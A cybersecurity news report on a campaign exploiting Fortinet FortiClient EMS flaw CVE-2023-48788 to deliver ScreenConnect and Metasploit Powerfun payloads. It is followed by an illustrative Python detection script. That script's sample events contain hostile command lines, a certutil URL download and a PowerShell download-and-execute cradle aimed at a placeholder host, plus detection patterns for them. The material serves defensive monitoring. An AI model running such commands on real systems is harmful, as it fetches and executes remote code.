Fortinet Flaw Exploited in New Cyberattack Campaign Involving ScreenConnect and Metasploit

April 17, 2024

A new cyberattack campaign has been discovered that exploits a security flaw, CVE-2023-48788, in Fortinet FortiClient EMS devices. The critical SQL injection flaw could allow an unauthenticated attacker to execute unauthorized code or commands. The campaign, monitored by cybersecurity firm Forescout under the codename Connect:fun, involves the delivery of ScreenConnect and Metasploit Powerfun payloads.

The targeted company, which operates in the media sector, had its vulnerable FortiClient EMS device exposed to the internet shortly after a proof-of-concept (PoC) exploit for the flaw was released on March 21, 2024. Over the next few days, the unidentified threat actor attempted to download ScreenConnect and install the remote desktop software using the msiexec utility, but was unsuccessful.

On March 25, the PoC exploit was used to execute PowerShell code that downloaded the Metasploit Powerfun script and initiated a reverse connection to another IP address. Additionally, SQL statements were observed attempting to download ScreenConnect from a remote domain ('ursketz[.]com') using certutil, which was then installed via msiexec before establishing a connection with a command-and-control (C2) server.

The threat actor behind the campaign, active since at least 2022, appears to specifically target Fortinet appliances and uses Vietnamese and German languages in their infrastructure. Security researcher Sai Molige noted, 'The observed activity clearly has a manual component evidenced by all the failed attempts to download and install tools, as well as the relatively long time taken between attempts. This is evidence that this activity is part of a specific campaign, rather than an exploit included in automated cybercriminal botnets. From our observations, it appears that the actors behind this campaign are not mass scanning but choosing target environments that have VPN appliances.'

Forescout highlighted that the attack shares tactical and infrastructure overlaps with other incidents documented by Palo Alto Networks Unit 42 and Blumira in March 2024 that involve the abuse of CVE-2023-48788. Organizations are advised to apply patches provided by Fortinet to mitigate potential threats, monitor for suspicious traffic, and use a web application firewall (WAF) to block potentially malicious requests.
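As an added illustration of the monitoring advice above (example code written for this article, not Forescout's or Fortinet's tooling), the rules below run over constructed process-creation events and flag each stage of the chain this page describes: the database engine spawning a shell (the point where SQL injection becomes command execution), certutil fetching a URL, msiexec installing from a URL or temp path, and a PowerShell download cradle. The sample events, host names and paths are placeholders, not indicators from the campaign.

```python
import re

# Constructed sample process-creation events (not real telemetry). They mimic
# the shape of logs a FortiClient EMS host could produce during the chain
# described above; 'example.invalid' is a placeholder, not the page's domain.
SAMPLE_EVENTS = [
    {"parent": "sqlservr.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c certutil -urlcache -f http://example.invalid/sc.msi C:\\Temp\\sc.msi"},
    {"parent": "cmd.exe", "image": "msiexec.exe",
     "cmdline": "msiexec /i C:\\Temp\\sc.msi /quiet"},
    {"parent": "sqlservr.exe", "image": "powershell.exe",
     "cmdline": "powershell -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')"},
    {"parent": "explorer.exe", "image": "msiexec.exe",      # benign admin install
     "cmdline": "msiexec /i C:\\Users\\admin\\Downloads\\7zip.msi"},
]

DB_ENGINES = {"sqlservr.exe"}            # FortiClient EMS stores its data in MS SQL
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
URL = re.compile(r"https?://", re.I)
CRADLE = re.compile(r"iex|invoke-expression|downloadstring|downloadfile", re.I)
TEMP_PATH = re.compile(r"\\(temp|tmp)\\", re.I)

RULES = {
    # The SQL injection only matters once the database engine runs a shell.
    "db_spawns_shell": lambda e: e["parent"].lower() in DB_ENGINES
        and e["image"].lower() in SHELLS,
    # certutil given a URL: living-off-the-land file download.
    "certutil_download": lambda e: "certutil" in e["cmdline"].lower()
        and bool(URL.search(e["cmdline"])),
    # msiexec installing from a URL or a temp directory instead of a managed share.
    "msiexec_suspicious_install": lambda e: e["image"].lower() == "msiexec.exe"
        and bool(URL.search(e["cmdline"]) or TEMP_PATH.search(e["cmdline"])),
    # PowerShell fetching and executing remote code (Powerfun-style stager).
    "powershell_cradle": lambda e: e["image"].lower() in {"powershell.exe", "pwsh.exe"}
        and bool(URL.search(e["cmdline"])) and bool(CRADLE.search(e["cmdline"])),
}

def evaluate(events):
    """Return per-event rule hits and whether the full chain was observed:
    a shell spawned by the database engine plus at least one tool download."""
    hits = [[name for name, rule in RULES.items() if rule(e)] for e in events]
    seen = {name for h in hits for name in h}
    downloads = {"certutil_download", "msiexec_suspicious_install", "powershell_cradle"}
    chain = "db_spawns_shell" in seen and bool(seen & downloads)
    return hits, chain

if __name__ == "__main__":
    for event, names in zip(SAMPLE_EVENTS, evaluate(SAMPLE_EVENTS)[0]):
        print(event["image"], "->", names or "clean")
```

The per-stage hits are useful on their own, but the chain flag is what separates this pattern from a lone admin running msiexec on a downloaded installer.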
